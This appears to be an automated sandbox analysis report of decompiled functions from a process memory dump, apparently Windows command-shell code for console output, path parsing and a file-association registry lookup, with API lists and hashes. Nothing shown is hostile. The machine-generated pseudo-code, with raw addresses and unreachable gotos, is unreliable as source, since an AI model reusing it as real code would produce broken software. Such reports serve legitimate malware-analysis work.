0x0033b6b2
0x0033b659
0x0033b64b
0x00000000

APIs

Part of subcall function 0034269C: _get_osfhandle.MSVCRT ref: 003426A7
Part of subcall function 0034269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0033C5F8,?,?,?), ref: 003426B6
Part of subcall function 0034269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426D2
Part of subcall function 0034269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000002), ref: 003426E1
Part of subcall function 0034269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003426EC
Part of subcall function 0034269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426F5

_get_osfhandle.MSVCRT ref: 0034987D
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,003464F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00349885
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,003465F0,?,003464F0), ref: 003498C4
_get_osfhandle.MSVCRT ref: 003498DD
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,003464F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 003498E5

Part of subcall function 003427C8: _get_osfhandle.MSVCRT ref: 003427DB
Part of subcall function 003427C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0036B980,000000FF,0035D620,00002000,00000000,00000000), ref: 0034281C
Part of subcall function 003427C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0035D620,-00000001,?,00000000), ref: 00342831

longjmp.MSVCRT(0036B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00349968

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
String ID:
API String ID: 1333215474-0
Opcode ID: 698e3e632d6f839d794744c383c4d476b64ec89a4f60ea90cad6180a45e65bb6
Instruction ID: 22e3af81b1e2f85012a8277f12c72c68b76de8270799e1dd6d18b90b4cd5b7f4
Opcode Fuzzy Hash: 698e3e632d6f839d794744c383c4d476b64ec89a4f60ea90cad6180a45e65bb6
Instruction Fuzzy Hash: 50517231B00301ABDB26ABB5D886B6FB7E8EB04711F11452BE906DB182EB75ED408B50

Uniqueness

Uniqueness Score: -1.00%

Function 0033C923, Relevance: 10.8, APIs: 7, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0033C923(signed short** __ecx) {
				signed short* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed short _t33;
				signed int _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed int _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				WCHAR* _t42;
				WCHAR* _t47;
				signed int _t48;
				signed int _t49;
				void* _t54;
				long _t56;
				int _t62;
				signed short _t64;
				signed int _t69;
				signed int _t70;
				signed short* _t72;
				signed short* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				signed int _t79;
				signed char _t80;
				signed short* _t82;
				WCHAR* _t84;
				WCHAR* _t90;
				signed int _t95;
				signed short* _t107;
				signed int _t108;
				short* _t109;
				short* _t111;
				WCHAR* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				WCHAR** _t121;
				signed short* _t122;
				signed int _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				int _t130;
				signed int _t131;
				WCHAR* _t132;

				_t121 = __ecx;
				_v12 = 0x331f8c;
				 *0x373cf0 = 0;
				_t82 =  *__ecx;
				_t122 = _t82;
				_t2 =  &(_t122[1]); // 0x2
				_t107 = _t2;
				do {
					_t33 =  *_t122;
					_t122 =  &(_t122[1]);
				} while (_t33 != 0);
				_t34 =  *_t82 & 0x0000ffff;
				_t124 = _t122 - _t107 >> 1;
				_t74 = _t82;
				_v20 = _t124;
				_t108 = _t34;
				if(_t34 == 0) {
					L6:
					_t35 = 0x3a;
					_v8 = _t74;
					_v24 = _t35;
					if(_t108 == _t35) {
						__eflags = _t124 - 2;
						if(_t124 <= 2) {
							goto L7;
						}
						 *_t74 = 0;
						_t24 = _t74 - 2; // -2
						_v8 = _t24;
						_t62 = SetErrorMode(0);
						_t102 =  *_t121;
						_v16 = _t62;
						_t132 = E0033D120( *_t121, 0x8000, _t82);
						__eflags = _t132 - 0xffffffff;
						if(_t132 == 0xffffffff) {
							L49:
							__eflags =  *0x35d0dc - 4;
							_t64 = 0x3a;
							_v8 = _t74;
							 *_t74 = _t64;
							if( *0x35d0dc != 4) {
								E0033C5A2(_t102, 0x236b, 1,  *_t121);
							} else {
								__eflags =  *0x35d5a8;
								if( *0x35d5a8 == 0) {
									E0033C5A2(_t102, 0x236b, 1,  *_t121);
								}
								 *0x35d5a4 = 1;
							}
							__eflags = _t132 - 0xffffffff;
							L55:
							if(__eflags == 0) {
								L57:
								SetErrorMode(_v16);
								goto L7;
							}
							L56:
							E0033DB92(_t132);
							goto L57;
						}
						_t69 = E00340178(_t63);
						__eflags = _t69;
						if(_t69 != 0) {
							L47:
							_t70 = E00340178(_t69);
							__eflags = _t70;
							if(_t70 != 0) {
								goto L56;
							}
							__eflags = E00359953(_t70, _t132);
							goto L55;
						}
						_t102 = _t132;
						_t69 = E00359953(_t69, _t132);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L49;
						}
						goto L47;
					}
					L7:
					_t83 = 0x250;
					_t36 = E003400B0(0x250);
					if(_t36 == 0) {
						L58:
						E00359287(_t83);
						__imp__longjmp(0x36b8b8, 1);
						L59:
						_t125 =  *_t121;
						_t75 = 0;
						__eflags = 0;
						_t84 = _t125;
						_t29 =  &(_t84[1]); // 0x0
						_t109 = _t29;
						do {
							_t38 =  *_t84;
							_t84 =  &(_t84[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						__eflags = _t84 - _t109 >> 1 - 2;
						if(_t84 - _t109 >> 1 >= 2) {
							_t38 = 0x3a;
							__eflags = _t125[1] - _t38;
							if(_t125[1] == _t38) {
								_t125 =  &(_t125[2]);
							}
						}
						L11:
						__imp___wcsicmp(_t125, ".");
						if(_t38 == 0) {
							L39:
							_t126 =  *_t121;
							_t39 = 0x5c;
							_t40 = E00342349(_t126, _t39);
							__eflags = _t40;
							if(_t40 == 0) {
								_t90 = _t126;
								__eflags = 0;
								_t31 =  &(_t90[1]); // 0x0
								_t111 = _t31;
								do {
									_t41 =  *_t90;
									_t90 =  &(_t90[1]);
									__eflags = _t41;
								} while (_t41 != 0);
								__eflags = _t90 - _t111 >> 1 - 2;
								if(_t90 - _t111 >> 1 != 2) {
									goto L40;
								}
								_t54 = 0x3a;
								__eflags = _t126[1] - _t54;
								if(_t126[1] == _t54) {
									L42:
									 *(_t121[6]) = 0x10;
									L17:
									_t79 = 1;
									_t129 = 0;
									_t47 =  *_t121;
									_t114 = _t47;
									while(1) {
										_t95 =  *_t114 & 0x0000ffff;
										if(_t95 == 0) {
											break;
										}
										if(_t95 == _v16) {
											L23:
											_t129 = _t114;
											L21:
											_t114 =  &(_t114[1]);
											_t79 = _t79 + 1;
											continue;
										}
										if(_t95 == _v24) {
											__eflags = _t79 - 2;
											if(_t79 != 2) {
												goto L21;
											}
											goto L23;
										}
										goto L21;
									}
									_t121[3] = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t129 = _t47;
									} else {
										__eflags =  *_t129;
										if( *_t129 == 0) {
											_t47 = _t129;
										} else {
											_t12 =  &(_t129[1]); // 0x2
											_t47 = _t12;
										}
									}
									_t115 = 0x2a;
									_t121[4] = _t47;
									_t48 = E0033D7D4(_t129, _t115);
									__eflags = _t48;
									if(_t48 == 0) {
										_t116 = 0x3f;
										_t49 = E0033D7D4(_t129, _t116);
										__eflags = _t49;
										if(_t49 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										L28:
										_t14 =  &(_t121[7]);
										 *_t14 = _t121[7] | 0x00000008;
										__eflags =  *_t14;
										 *0x373cd0 = 1;
										L29:
										_t117 = 0x2e;
										_t121[5] = E0033D7D4(_t129, _t117);
										__eflags = 1;
										return 1;
									}
								}
							}
							L40:
							_t77 =  *_t121;
							_t83 = _v20 + 5 + _v20 + 5;
							_t42 = E003400B0(_v20 + 5 + _v20 + 5);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L58;
							}
							 *_t121 = _t42;
							E00341040(_t42, _t128, _t77);
							E003418C0( *_t121, _t128, _v12);
							goto L42;
						}
						__imp___wcsicmp(_t125, L"..");
						if(_t38 == 0) {
							goto L39;
						}
						if( *0x35d0dc == 4) {
							__eflags =  *0x35d5ac - 1;
							if( *0x35d5ac == 1) {
								goto L14;
							}
							__eflags =  *0x35d0c0 - 1;
							if( *0x35d0c0 != 1) {
								goto L17;
							}
							 *0x35d0c0 = _t75;
						}
						L14:
						_t80 = GetFileAttributesW( *_t121);
						if(_t80 != 0xffffffff) {
							_t56 = 0;
						} else {
							_t56 = GetLastError();
						}
						 *0x373cf0 = _t56;
						if(_t80 != 0xffffffff) {
							__eflags = _t80 & 0x00000010;
							if((_t80 & 0x00000010) == 0) {
								goto L17;
							}
							goto L39;
						} else {
							goto L17;
						}
					}
					_t121[6] = _t36;
					_t130 = 0x5c;
					_v16 = _t130;
					if(( *_v8 & 0x0000ffff) == _t130) {
						_v12 = 0x331f8e;
						goto L39;
					}
					_t38 = E00342349( *_t121, _t130);
					_t131 = _t38;
					if(_t131 == 0) {
						goto L59;
					}
					_t125 = _t131 + 2;
					_t75 = 0;
					goto L11;
				} else {
					goto L4;
					L4:
					_t72 = _t82;
					_t74 = _t82;
					_t82 =  &(_t82[1]);
					if( *_t82 != 0) {
						goto L4;
					} else {
						_t108 =  *_t72 & 0x0000ffff;
						goto L6;
					}
				}
			}

0x0033c92e
0x0033c930
0x0033c939
0x0033c93f
0x0033c941
0x0033c943
0x0033c943
0x0033c946
0x0033c946
0x0033c949
0x0033c94c
0x0033c951
0x0033c956
0x0033c958
0x0033c95a
0x0033c95d
0x0033c962
0x0033c975
0x0033c977
0x0033c978
0x0033c97b
0x0033c981
0x0034aff7
0x0034affa
0x00000000
0x00000000
0x0034b002
0x0034b005
0x0034b008
0x0034b00e
0x0034b015
0x0034b01c
0x0034b024
0x0034b026
0x0034b029
0x0034b057
0x0034b057
0x0034b060
0x0034b061
0x0034b064
0x0034b067
0x0034b098
0x0034b069
0x0034b069
0x0034b070
0x0034b07b
0x0034b080
0x0034b083
0x0034b083
0x0034b0a0
0x0034b0a3
0x0034b0a3
0x0034b0ac
0x0034b0af
0x00000000
0x0034b0af
0x0034b0a5
0x0034b0a7
0x00000000
0x0034b0a7
0x0034b02d
0x0034b032
0x0034b034
0x0034b041
0x0034b043
0x0034b048
0x0034b04a
0x00000000
0x00000000
0x0034b053
0x00000000
0x0034b053
0x0034b036
0x0034b038
0x0034b03d
0x0034b03f
0x00000000
0x00000000
0x00000000
0x0034b03f
0x0033c987
0x0033c987
0x0033c98c
0x0033c993
0x0034b0ba
0x0034b0ba
0x0034b0c6
0x0034b0cc
0x0034b0cc
0x0034b0ce
0x0034b0ce
0x0034b0d0
0x0034b0d2
0x0034b0d2
0x0034b0d5
0x0034b0d5
0x0034b0d8
0x0034b0db
0x0034b0db
0x0034b0e4
0x0034b0e7
0x0034b0ef
0x0034b0f0
0x0034b0f4
0x0034b0fa
0x0034b0fa
0x0034b0f4
0x0033c9c9
0x0033c9cf
0x0033c9d9
0x0033caf4
0x0033caf4
0x0033cafa
0x0033cafd
0x0033cb02
0x0033cb04
0x0034b102
0x0034b104
0x0034b106
0x0034b106
0x0034b109
0x0034b109
0x0034b10c
0x0034b10f
0x0034b10f
0x0034b118
0x0034b11b
0x00000000
0x00000000
0x0034b123
0x0034b124
0x0034b128
0x0033cb3a
0x0033cb3d
0x0033ca29
0x0033ca2b
0x0033ca2e
0x0033ca30
0x0033ca32
0x0033ca34
0x0033ca34
0x0033ca3a
0x00000000
0x00000000
0x0033ca40
0x0033ca53
0x0033ca53
0x0033ca48
0x0033ca48
0x0033ca4b
0x00000000
0x0033ca4b
0x0033ca46
0x0033ca4e
0x0033ca51
0x00000000
0x00000000
0x00000000
0x0033ca51
0x00000000
0x0033ca46
0x0033ca57
0x0033ca5a
0x0033ca5c
0x0034b13a
0x0033ca62
0x0033ca64
0x0033ca67
0x0034b133
0x0033ca6d
0x0033ca6d
0x0033ca6d
0x0033ca6d
0x0033ca67
0x0033ca72
0x0033ca75
0x0033ca78
0x0033ca7d
0x0033ca7f
0x0033caa8
0x0033caab
0x0033cab0
0x0033cab2
0x00000000
0x00000000
0x00000000
0x0033ca81
0x0033ca81
0x0033ca81
0x0033ca81
0x0033ca81
0x0033ca85
0x0033ca8f
0x0033ca91
0x0033ca99
0x0033caa0
0x0033caa5
0x0033caa5
0x0033ca7f
0x0034b12e
0x0033cb0a
0x0033cb0d
0x0033cb12
0x0033cb15
0x0033cb1a
0x0033cb1c
0x00000000
0x00000000
0x0033cb25
0x0033cb29
0x0033cb35
0x00000000
0x0033cb35
0x0033c9e5
0x0033c9ef
0x00000000
0x00000000
0x0033c9fc
0x0033cac8
0x0033cacf
0x00000000
0x00000000
0x0033cad5
0x0033cadc
0x00000000
0x00000000
0x0033cae2
0x0033cae2
0x0033ca02
0x0033ca0a
0x0033ca0f
0x0033cab6
0x0033ca15
0x0033ca15
0x0033ca15
0x0033ca1b
0x0033ca23
0x0033cabd
0x0033cac0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ca23
0x0033c999
0x0033c9a1
0x0033c9a2
0x0033c9ab
0x0033caed
0x00000000
0x0033caed
0x0033c9b5
0x0033c9ba
0x0033c9be
0x00000000
0x00000000
0x0033c9c4
0x0033c9c7
0x00000000
0x0033c964
0x0033c964
0x0033c966
0x0033c966
0x0033c968
0x0033c96a
0x0033c970
0x00000000
0x0033c972
0x0033c972
0x00000000
0x0033c972
0x0033c970

APIs

_wcsicmp.MSVCRT ref: 0033C9CF
_wcsicmp.MSVCRT ref: 0033C9E5
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 0033CA04
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0033CA15

Part of subcall function 0033D7D4: wcschr.MSVCRT ref: 0033D7DA

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp$AttributesErrorFileLastwcschr
String ID:
API String ID: 2943530692-0
Opcode ID: 566344daddfea242b52ed6d762a9e9b9735022b0d4667e9546459d1e822f5019
Instruction ID: 77b93a706eaaef44ae5866a8f9c5537f8c624b309723e08bc285cd0423e760ef
Opcode Fuzzy Hash: 566344daddfea242b52ed6d762a9e9b9735022b0d4667e9546459d1e822f5019
Instruction Fuzzy Hash: 6C912535B10215DBDB37EF74988566AB3E4FF08315F16812AE916EB2D0EB709D81C781

Uniqueness

Uniqueness Score: -1.00%

Function 00345E50, Relevance: 10.8, APIs: 7, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00345E50(void* __ecx) {
				intOrPtr _v8;
				long _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				short _v52;
				WCHAR* _v54;
				signed char _v56;
				signed int _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				long _v72;
				long _v80;
				WCHAR* _v88;
				signed char* _v92;
				short _v104;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t61;
				WCHAR* _t65;
				short _t66;
				void* _t67;
				void* _t68;
				void* _t74;
				short _t77;
				void* _t78;
				short _t82;
				wchar_t* _t85;
				signed char _t86;
				short _t89;
				short _t90;
				wchar_t* _t102;
				long _t103;
				short* _t104;
				short _t105;
				long _t106;
				short* _t109;
				signed int _t110;
				WCHAR* _t114;
				WCHAR* _t126;
				short _t132;
				long _t134;
				WCHAR* _t138;
				short* _t142;
				void* _t147;
				WCHAR* _t149;
				void* _t150;
				signed int _t155;
				signed int _t157;
				short _t163;

				_t110 = _t155;
				_push(__ecx);
				_push(__ecx);
				_t157 = (_t155 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t110 + 4));
				_t153 = _t157;
				_push(0xfffffffe);
				_push(0x35be38);
				_push(E00347290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t110);
				_t60 =  *0x35d0b4; // 0xd59bd0e8
				_v20 = _v20 ^ _t60;
				_t61 = _t60 ^ _t157;
				_v48 = _t61;
				_push(_t61);
				 *[fs:0x0] =  &_v28;
				_v36 = _t157 - 0x48;
				_t65 = E0033EA40( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)) + 0x3c)), 0, 0 |  *0x373cc9 != 0x00000000);
				_t149 = _t65;
				_v64 = _t149;
				_v68 = _t149;
				if( *0x373cc9 == 0) {
					L6:
					_t114 = _t149;
					_t15 =  &(_t114[1]); // 0x2
					_t142 = _t15;
					do {
						_t66 =  *_t114;
						_t114 =  &(_t114[1]);
					} while (_t66 != 0);
					_v60 = _t114 - _t142 >> 1;
					_t67 = E003422C0(_t110, _t149);
					_t144 = _v60 + 1;
					_t118 = _t149;
					_t68 = E00341040(_t149, _v60 + 1, _t67);
					 *0x36b8b0 = 0;
					if( *_t149 == 0) {
						E003583FD(_t68, _t118);
						L18:
						 *[fs:0x0] = _v28;
						_pop(_t147);
						_pop(_t150);
						return E00346FD0( *0x36b8b0, _t110, _v48 ^ _t153, _t144, _t147, _t150);
					}
					if(E00345D59(_t110) == 0) {
						_push(0);
						_push(0x40002728);
						L47:
						E0033C5A2(_t118);
						 *0x36b8b0 = 1;
						goto L18;
					}
					if( *0x373cc9 == 0) {
						L12:
						_t171 =  *0x36b8b0;
						if( *0x36b8b0 != 0) {
							L45:
							_t74 = E00344B96(_t110, 0, _t149, __eflags);
							RtlFreeHeap(GetProcessHeap(), 0, _t74);
							_push(0);
							_push( *0x36b8b0);
							goto L47;
						}
						_t144 = 0;
						_t118 = _t149;
						_t77 = E003433FC(_t110, _t149, 0, 0, _t149, _t171);
						 *0x36b8b0 = _t77;
						if(_t77 == 0) {
							_t78 = 0x3a;
							if(_t149[1] == _t78) {
								if( *0x373cb8 == 0) {
									_t118 = 0x373ab0;
								}
								_t144 =  *0x373cc0;
								E003436CB(_t110, _t118,  *0x373cc0,  *_t149 & 0x0000ffff);
							}
						}
						if( *0x36b8b0 != 0) {
							goto L45;
						}
						goto L18;
					}
					_t144 = 0x5c;
					if( *_t149 == _t144) {
						__eflags = _t149[1] - _t144;
						if(__eflags != 0) {
							goto L12;
						}
						_t126 = _t149;
						_t24 =  &(_t126[1]); // 0x2
						_v60 = _t24;
						do {
							_t82 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t82;
						} while (_t82 != 0);
						_v72 = (_t126 - _v60 >> 1) + 1;
						_t29 =  &(_t149[2]); // 0x4
						_t85 = wcschr(_t29, _t144);
						_v60 = _t85;
						__eflags = _t85;
						if(_t85 != 0) {
							_t134 = 0x5c;
							_t102 = wcschr( &(_t85[0]), _t134);
							_v60 = _t102;
							__eflags = _t102;
							if(_t102 != 0) {
								_t103 = GetFileAttributesW(_t149);
								__eflags = _t103 - 0xffffffff;
								if(_t103 != 0xffffffff) {
									_t104 = _v60;
									 *_t104 = 0;
									_t105 = _t104 + 2;
									__eflags = _t105;
									_v60 = _t105;
								} else {
									_t106 = GetLastError();
									 *0x36b8b0 = _t106;
									__eflags = _t106 - 2;
									if(_t106 == 2) {
										 *0x36b8b0 = 3;
									}
								}
							}
						}
						_t86 = 0x5a;
						_v56 = _t86;
						_t118 = 0x3a;
						_v54 = _t118;
						__eflags = 0;
						_v52 = 0;
						_v104 = 1;
						_v92 =  &_v56;
						_v88 = _t149;
						_v80 = 0;
						while(1) {
							__eflags =  *0x36b8b0;
							if(__eflags != 0) {
								goto L45;
							}
							__eflags = _v56 - 0x41;
							if(__eflags == 0) {
								goto L12;
							}
							_v16 = 0;
							_t89 = E00347797(_t118);
							__eflags = _t89;
							if(_t89 == 0) {
								 *0x36b8b0 = 0x78;
							} else {
								 *0x36b8b0 =  *0x37c030( &_v108, 0, 0, 0);
							}
							_v16 = 0xfffffffe;
							_t90 =  *0x36b8b0;
							__eflags = _t90;
							if(_t90 == 0) {
								_t144 = _v56;
								 *((short*)( *0x373ce8 +  *0x373ce4 * 8 - 4)) = _v56;
								 *_t149 = _v56;
								_t149[1] = _v54;
								_t132 = 0x5c;
								_t149[2] = _t132;
								_t118 =  &(_v68[3]);
								_t94 = _v60;
								__eflags = _v60;
								if(__eflags == 0) {
									 *_t118 = 0;
								} else {
									_t144 = _v72;
									E00341040(_t118, _v72, _t94);
								}
								goto L12;
							} else {
								__eflags = _t90 - 0x55;
								if(_t90 == 0x55) {
									L41:
									_v56 = (_v56 & 0x000000ff) - 1;
									 *0x36b8b0 = 0;
									continue;
								}
								__eflags = _t90 - 0x4b2;
								if(_t90 != 0x4b2) {
									continue;
								}
								goto L41;
							}
						}
						goto L45;
					}
					goto L12;
				} else {
					_t138 = _t149;
					_t163 =  *_t149;
					L3:
					_v60 = _t65;
					if(_t163 != 0) {
						_t65 = _t138;
						_t138 =  &(_t138[1]);
						__eflags =  *_t138;
						goto L3;
					}
					L4:
					while(_t65 > _t149 && iswspace( *_t65 & 0x0000ffff) != 0) {
						_t109 = _v60;
						 *_t109 = 0;
						_t65 = _t109 - 2;
						_v60 = _t65;
					}
					goto L6;
				}
			}

0x00345e53
0x00345e55
0x00345e56
0x00345e5a
0x00345e61
0x00345e65
0x00345e67
0x00345e69
0x00345e6e
0x00345e79
0x00345e7a
0x00345e7b
0x00345e7c
0x00345e80
0x00345e85
0x00345e88
0x00345e8a
0x00345e8f
0x00345e93
0x00345e99
0x00345eb0
0x00345eb5
0x00345eb7
0x00345eba
0x00345ec6
0x00345ef3
0x00345ef3
0x00345ef5
0x00345ef5
0x00345ef8
0x00345ef8
0x00345efb
0x00345efe
0x00345f07
0x00345f0c
0x00345f15
0x00345f16
0x00345f18
0x00345f1d
0x00345f26
0x0034f393
0x00345f9c
0x00345fa4
0x00345fac
0x00345fad
0x00345fbe
0x00345fbe
0x00345f33
0x0034f55a
0x0034f55b
0x0034f560
0x0034f560
0x0034f566
0x00000000
0x0034f570
0x00345f40
0x00345f4e
0x00345f4e
0x00345f55
0x0034f53d
0x0034f53d
0x0034f54b
0x0034f551
0x0034f552
0x00000000
0x0034f552
0x00345f5b
0x00345f5d
0x00345f5f
0x00345f64
0x00345f6b
0x00345f6f
0x00345f74
0x00345f7e
0x00345fc1
0x00345fc1
0x00345f84
0x00345f8a
0x00345f8a
0x00345f74
0x00345f96
0x00000000
0x00000000
0x00000000
0x00345f96
0x00345f44
0x00345f48
0x0034f39d
0x0034f3a1
0x00000000
0x00000000
0x0034f3a7
0x0034f3a9
0x0034f3ac
0x0034f3af
0x0034f3af
0x0034f3b2
0x0034f3b5
0x0034f3b5
0x0034f3c2
0x0034f3c6
0x0034f3ca
0x0034f3d2
0x0034f3d5
0x0034f3d7
0x0034f3db
0x0034f3e1
0x0034f3e9
0x0034f3ec
0x0034f3ee
0x0034f3f1
0x0034f3f7
0x0034f3fa
0x0034f41a
0x0034f41d
0x0034f420
0x0034f420
0x0034f423
0x0034f3fc
0x0034f3fc
0x0034f402
0x0034f407
0x0034f40a
0x0034f40c
0x0034f40c
0x0034f40a
0x0034f3fa
0x0034f3ee
0x0034f428
0x0034f429
0x0034f42f
0x0034f430
0x0034f434
0x0034f436
0x0034f43a
0x0034f444
0x0034f447
0x0034f44a
0x0034f44d
0x0034f44d
0x0034f454
0x00000000
0x00000000
0x0034f45a
0x0034f45f
0x00000000
0x00000000
0x0034f465
0x0034f468
0x0034f46d
0x0034f46f
0x0034f485
0x0034f471
0x0034f47e
0x0034f47e
0x0034f48f
0x0034f4c0
0x0034f4c5
0x0034f4c7
0x0034f4ee
0x0034f4fd
0x0034f506
0x0034f50d
0x0034f513
0x0034f514
0x0034f51b
0x0034f51e
0x0034f521
0x0034f523
0x0034f535
0x0034f525
0x0034f526
0x0034f529
0x0034f529
0x00000000
0x0034f4c9
0x0034f4c9
0x0034f4cc
0x0034f4d9
0x0034f4df
0x0034f4e3
0x00000000
0x0034f4e3
0x0034f4ce
0x0034f4d3
0x00000000
0x00000000
0x00000000
0x0034f4d3
0x0034f4c7
0x00000000
0x0034f44d
0x00000000
0x00345ec8
0x00345ec8
0x00345eca
0x00345ed7
0x00345ed7
0x00345eda
0x00345ecf
0x00345ed1
0x00345ed4
0x00000000
0x00345ed4
0x00000000
0x00345edc
0x0034f382
0x0034f385
0x0034f388
0x0034f38b
0x0034f38b
0x00000000
0x00345edc

APIs

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

iswspace.MSVCRT ref: 00345EE4

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$iswspace
String ID:
API String ID: 3458554142-0
Opcode ID: 020e9f985efe4640b64eb81747e977d5ebd9bc27139941f33a47d635eb56d5cd
Instruction ID: 5f872b3aa4df758f94937996e34bfabe20b7e9a8970718c6c0e022d1c695f84c
Opcode Fuzzy Hash: 020e9f985efe4640b64eb81747e977d5ebd9bc27139941f33a47d635eb56d5cd
Instruction Fuzzy Hash: C791BF74904644DFDB26DF68EC45AAEB7F8FF48710F14812EE416DB290EB70A980CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00354CF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00354CF0(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t38;
				int _t42;
				signed int _t44;
				signed int _t45;
				signed int _t56;
				long _t64;
				intOrPtr _t67;
				short* _t69;
				signed int _t72;
				void* _t76;
				short* _t80;
				void* _t81;
				void* _t83;
				signed int _t90;
				signed int _t92;
				void* _t98;
				signed int _t99;
				void* _t102;
				signed int _t105;
				signed int _t108;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				int _t120;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t113 = __edx;
				_t38 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t38 ^ _t126;
				_t81 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					__eflags =  *__edx - 0x2e;
					if( *__edx != 0x2e) {
						_t119 = E0033DF40(E0033DEF9(__edx));
						__eflags = _t119;
						if(_t119 == 0) {
							L34:
							_t42 = 1;
							L55:
							return E00346FD0(_t42, _t81, _v8 ^ _t126, _t113, _t119, _t120);
						}
						_t44 = E00342349(_t119, 0x20);
						__eflags = _t44;
						if(_t44 != 0) {
							__eflags = 0;
							 *_t44 = 0;
						}
						_t90 = _t119;
						_t29 = _t90 + 2; // 0x2
						_t113 = _t29;
						do {
							_t45 =  *_t90;
							_t90 = _t90 + 2;
							__eflags = _t45;
						} while (_t45 != 0);
						_t92 = _t90 - _t113 >> 1;
						_push(_t119);
						_t30 = _t92 + 0x14; // 0x12
						__eflags = _t30 - 0x104;
						if(_t30 <= 0x104) {
							E00341040( &_v528, 0x104);
							_t113 = 0x104;
							E003418C0( &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t120 = RegOpenKeyExW(_t81,  &_v528, 0, 0x2000000,  &_v548);
							__eflags = _t120;
							if(__eflags == 0) {
								_t113 =  &_v528;
								_t95 = _t81;
								_t81 = E00355662(_t81, _t81,  &_v528, _t119, _t120, __eflags);
								__eflags = _t81;
								if(_t81 == 0) {
									L51:
									E0033C5A2(_t95, 0x400023a5, 1, _t119);
									L52:
									E00340040(_t81);
									L53:
									E00340040(_t119);
									L54:
									_t42 = _t120;
									goto L55;
								}
								_t98 = _t81;
								_t36 = _t98 + 2; // 0x2
								_t113 = _t36;
								do {
									_t56 =  *_t98;
									_t98 = _t98 + 2;
									__eflags = _t56;
								} while (_t56 != 0);
								_t99 = _t98 - _t113;
								__eflags = _t99;
								_t95 = _t99 >> 1;
								if(_t99 == 0) {
									goto L51;
								}
								_push(_t81);
								_push(_t119);
								E003425D9(L"%s=%s\r\n");
								goto L52;
							}
							E0033C5A2( &_v528, 0x400023a5, 1, _t119);
							goto L53;
						}
						_push(1);
						_push(0x400023db);
						E0033C5A2(_t92);
